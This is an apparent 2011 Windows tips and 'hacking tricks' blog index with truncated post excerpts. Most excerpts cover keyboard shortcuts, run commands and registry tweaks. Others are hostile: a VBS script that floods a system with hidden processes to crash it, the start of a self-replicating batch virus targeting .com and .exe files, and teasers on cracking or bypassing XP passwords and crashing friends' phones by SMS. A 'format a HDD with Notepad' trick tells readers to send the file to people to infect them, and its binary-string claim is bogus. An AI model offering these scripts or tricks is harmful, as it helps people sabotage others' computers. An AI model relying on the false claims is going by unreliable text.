How to Create Your Own Customized Run Commands
Run commandThe Run command on Microsoft Windows operating system allows you to directly open an application or document with just a single command instead of navigating to it’s location and double-clicking the executable icon. However, it only works for some of the inbuilt Windows programs such as Command prompt (cmd), Calculator (calc) etc. So, have you ever wondered how to create your own customized Run commands for accessing your favorite...
Tuesday, 21 June 2011
How to Create Run Commands
Read More »
Friday, 17 June 2011
REGEDIT Keyboard Shortcuts
REGEDIT Keyboard Shortcuts
Searching:
"Ctrl+F" -- Opens the Find dialog box.
"F3" -- Repeats the last search.
Browsing:
"Keypad +" -- Expands the selected branch.
"Keypad -" -- Collapses the selected branch.
"Keypad *" -- Expands all the selected branch's sub keys.
"Up Arrow" -- Selects the previous key.
"Down Arrow" -- Selects the next key.
"Left Arrow" -- Collapses the selected branch if it's not collapsed; otherwise, selects the parent key.
"Right Arrow" -- Expands the selected branch...
Microsoft(MS) Word Shorcut keys
Microsoft(MS) Word Shorcut keys
Keyboard Shortcut
Result in Microsoft Word
CTRL and A
Selects all in the current document.
CTRL and B
Bold text.
CTRL and C
Copies the item or text to the Clipboard and can be pasted using CTRL and V.
CTRL and D
Displays the Font dialogue box.
CTRL and E
Centre Alignment.
CTRL and F
Displays the Find dialog box, to search the current document.
CTRL and G
Displays the Go to dialog box, to go to a specific location in the current...
How to Format A HDD With Notepad
How to Format A HDD With Notepad
f you think that notepad is useless then you are wrong because you can now do a lot of things with a notepad which you could have never imagined.In this hack I will show you how to format a HDD using a notepad. This is really cool.
Step 1.
Copy The Following In Notepad Exactly as it says01001011000111110010010101010101010000011111100000
Step 2.
Save As An EXE Any Name Will Do
Step 3.
Send the EXE to People And Infect
OR
IF u think u cannot format c driver...
Hacking Windows
Hacking Windows SEND TO MENU
How often do you copy songs from a CD? Or some photos from a CD?
What do you do? You select the required files and do a CTRL –C. Open the destination folder and do a CTRL-V. Here is something you can benefit time from. Customize your SEND TO MENU.
This sounds simple and you can do it in less than sixty seconds.
You can create your own BASKET.
First you’ll need access to hidden files. So change your view settings to make all hidden files visible.
Tools...
Check out these trick.
Check out these funny trick.
1:Copy and paste the java script code to the address bar of your browser
javascript:function Shw(n) {if (self.moveBy) {for (i = 35; i > 0; i--) {for (j = n; j > 0; j--) {self.moveBy(1,i);self.moveBy(i,0);self.moveBy(0,-i);self.moveBy(-i,0); } } }} Shw(6)
javascript:a=0;x=0;y=0;setInterval("a+=.01;x=Math.cos(a*3)*200;y=Math.sin(a*2)*2;moveBy(x,y)",2);void(0)
2: Press enter and watch your window's "shaking it". You can change the value of i if you...
Complete list of run commands in windows XP
Run Commands In Windows XP
You can access all these programs by going through START-->RUN or Simply Click Windows Key+R
SQL Client Configuration - cliconfg
System Configuration Editor - sysedit
System Configuration Utility - msconfig
System File Checker Utility (Scan Immediately)- sfc /scannow
System File Checker Utility (Scan Once At Next Boot)- sfc /scanonce
System File Checker Utility (Scan On Every Boot) - sfc /scanboot
System File Checker Utility (Return to Default Setting)- sfc...
Windows Shortcuts
All keyboard Shortcuts
Windows Shortcuts
*
Shift + F10 right-clicks.
*
Win + L (XP Only): Locks keyboard. Similar to Lock Workstation.
*
Win + F or F3: Open Find dialog. (All Files) F3 may not work in some applications which use F3 for their own find dialogs.
*
Win + Control + F: Open Find dialog. (Computers)
*
Win + U: Open Utility Manager.
*
Win + F1: Open Windows help.
*
Win + Pause: Open System Properties...
A Complete list of DOS Command
DOS Command Index
Information about all current DOS commands
APPEND
(External)
APPEND ;
APPEND [d:]path[;][d:]path[...]
APPEND [/X:on|off][/path:on|off] [/E]
Displays or sets the search path for data files. DOS will search the specified path(s) if the file is not found in the current path.
ASSIGN
(External)
ASSIGN x=y [...] /sta
Redirects disk drive requests to a different drive.
ATTRIB
(External)
ATTRIB [d:][path]filename [/S]
ATTRIB [+R|-R] [+A|-A] [+S|-S] [+H|-H] [d:][path]filename...
Thursday, 16 June 2011
Delete or Remove Recycle bin Icon from Desktop
hack the worlds
If you are the kind of person who always likes neatness specially desktop, then here is a small trick for you that will simply remove the Recycle bin icon from desktop.
Follow the steps below:
[Start] [Run] [Regedit]
Registry Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\
CurrentVersion\Explorer\BitBucket
Modify/Create the Value Data Type(s) and Value Name(s) as detailed below.
Data Type: DWORD // Value Name: NukeOnDelete
Setting for Value Data: [0 = Use...
Shutdown for Windows OS
Did you know that in Windows XP you can shut down your computer from the (eventually DOS prompt) command line box? Moreover, you can do this by clicking your mouse only once.
All you need to do is... right-click on an empty Desktop spot -> select New -> Shortcut -> type shutdown followed by a space, and then enter one or more of the parameters listed below -> click Next -> type a suggestive name for your new shortcut -> finally, click Finish.
This is the Shutdown.exe...
Sunday, 12 June 2011
Reset an XP Password
Reset an XP Password
Option #1
ERD – Emergency recovery disk. Using this method you need to prepare ahead, by downloading one of FREE ERD tools and burning it onto CD.
ERDs are Free Windows password-cracking tools are usually Linux boot disks that have NT file system (NTFS) drivers and software that will read the registry and rewrite the password hashes for any account including the Administrators. This process requires physical access to the console but it works like a charm! I've...
Create files and folders without any name.
Create files and folders without any name.
Just follow the following steps:
1.Select any file or folder.
2.Right click on it, press rename or simply press F2.
3.Press and hold the alt key. While holding the Alt key, type numbers 0160 from the numpad.
Note: Type the numbers 0160 from the numpad, that is, the numbers present on the right side of the keyboard. Don’t type the numbers which are present on top of the character keys.
4.Press Enter and the nameless file or folder will be created.
Reason:...
Crash System
Crash System
1]Crash System
Open notepad type the following and save it as anyname.vbs
============================================================
set ws=CreateObject("wscript.shell")
do
ws.run "notepad",0
loop
============================================================
This program will infinitely open notepad in hidden mode causing your
system to crash...!
the value "0" in the third line specifies the mode in which the application
should run here it is hidden mode.
2]Close applications...
Cyber spying
Cyber spying
Cyber spying or Cyber espionage is the act or practice of obtaining secrets without the permission of the holder of the information (personal, sensitive, proprietary or of classified nature), from individuals, competitors, rivals, groups, governments and enemies for personal, economic, political or military advantage using illegal exploitation methods on the Internet, networks or individual computers through the use of cracking techniques and malicious software including...
How to Create a Virus Code
Virus Code
A simple VIRUS code is here: Just save the following code as .bat extension in notepad.
The antivirus will detect it as virus. see for yourself.
It will affect *.com and *.EXE files .
It will multiply itself and may get more dangerous when altered.
@echo off>nul.ViRuSif
“%1==”/ViRuS_MULTIPLY goto ViRuS_multiplyif
“%1==”/ViRuS_OUTER_LOOP goto ViRuS_outer_loopif
“%1==”/ViRuS_FINDSELF goto ViRuS_findselfif
“%VOFF%==”T goto ViRuS_OLDBAT
set ViRuSname=%0
if not...
Hack Windows XP Password
Hack Windows XP Password
Another method to login to a password protected Windows even if you do not have the password is by making Windows accepting any passwords.
There is a far better way to get into
Windows XP. It is easy and it does not reset the password. Hack into a computer running Windows XP without changing the password and find out all and any passwords on the machine (including admin accounts). You do not need access to any accounts to do this. Of course, do not do this on anyone...
Hack Mobile
Here is a new trick to restart ur friends mobile via sms
with this trick only 1110,1110i,1112,1100,2100 can be restarted.
just type
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
,,
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
or 79 inverted commas
in text msg and send it to ur friend having cells mention above and see wat happen...
Friday, 10 June 2011
hacker
Normal 0 false false false EN-US X-NONE X-NONE MicrosoftInternetExplorer4 ...